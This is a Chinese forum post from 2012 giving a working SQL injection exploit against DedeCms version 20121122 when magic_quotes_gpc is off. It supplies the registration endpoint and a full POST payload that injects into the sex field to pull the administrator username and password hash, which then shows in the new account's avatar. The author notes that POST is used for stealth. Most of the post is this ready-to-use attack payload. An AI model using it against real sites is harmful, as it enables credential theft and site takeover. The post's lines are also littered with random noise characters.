找回密码
 立即注册
查看: 2894|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122
5 o9 x' `  y2 s* {7 W+ |# D0 ?$ _6 X% F" R* O; p
需要magic_quotes_gpc=Off+ ~0 v9 O# a. o# q) J8 V6 n6 }0 q
) [( {3 @0 O  n7 U2 K) O4 @) f
应该是没有什么大危害的漏洞.
8 j: n: a0 Z/ m  n( g7 y3 t原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.# L" {2 I8 u& h# T5 A

- v) ~6 m0 Z9 g7 N+ d是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
; F6 n" v8 a0 O+ `% @  QPOST提交以下数据,其实不用POST提交的,这样隐蔽点.( Y4 }+ K. Y& W. C- ?7 Q6 C- \3 D

4 ?8 u, w6 {. ]http:///de/member/reg_new.php0 Z0 o4 C0 p, j  D" _

! h& l5 B. h1 s) r; e) Z1 XPOST
* m: q& u% V& I  R3 Q5 J6 C% d- C9 V6 Y# X
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
5 O& p4 e) Q. |
2 u2 l+ w, e* W1 w* `' ]成功注册后,头像处里面有好玩的信息.5 P7 A5 |3 n7 Z- b8 v  i

+ d! W' C; x/ ]4 a: p  u) _& o" R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表